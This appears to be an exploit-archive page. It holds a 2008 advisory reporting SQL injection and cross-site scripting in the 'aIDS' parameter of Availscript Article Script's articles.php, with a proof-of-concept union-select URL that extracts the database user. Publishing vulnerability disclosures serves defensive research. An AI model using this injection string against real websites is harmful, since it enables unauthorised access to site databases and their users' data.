477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
46 lines
1.7 KiB
Text
Executable file
46 lines
1.7 KiB
Text
Executable file
###########################################################
|
|
#
|
|
# ___ __ __ __ __
|
|
# /\_ \ /\ \\ \ /\ \/\ \
|
|
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____
|
|
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\
|
|
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_
|
|
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
|
|
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/
|
|
#
|
|
# security breakd0wn!
|
|
###########################################################
|
|
#
|
|
# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities
|
|
# Vendor: http://www.availscript.com/
|
|
# Vulnerable Version: N/A
|
|
# Fix: N/A
|
|
#
|
|
###########################################################
|
|
#
|
|
# c0ntact: sl4x.xuz[at]gmail[dot]com
|
|
# d0rk: "assh0le"
|
|
# stop lammo
|
|
#
|
|
###########################################################
|
|
|
|
######################
|
|
1. Information
|
|
######################
|
|
Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles.
|
|
|
|
######################
|
|
2. Vulnerabilities
|
|
######################
|
|
SQL Injection in "articles.php" in the "aIDS" parameter.
|
|
Cross Site Scripting in "articles.php" in the "aIDS" parameter.
|
|
|
|
######################
|
|
3. PoC
|
|
######################
|
|
http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
|
|
http://localhost/path/articles.php?aIDS=[XSS]
|
|
|
|
###########################################################
|
|
|
|
# milw0rm.com [2008-09-09]
|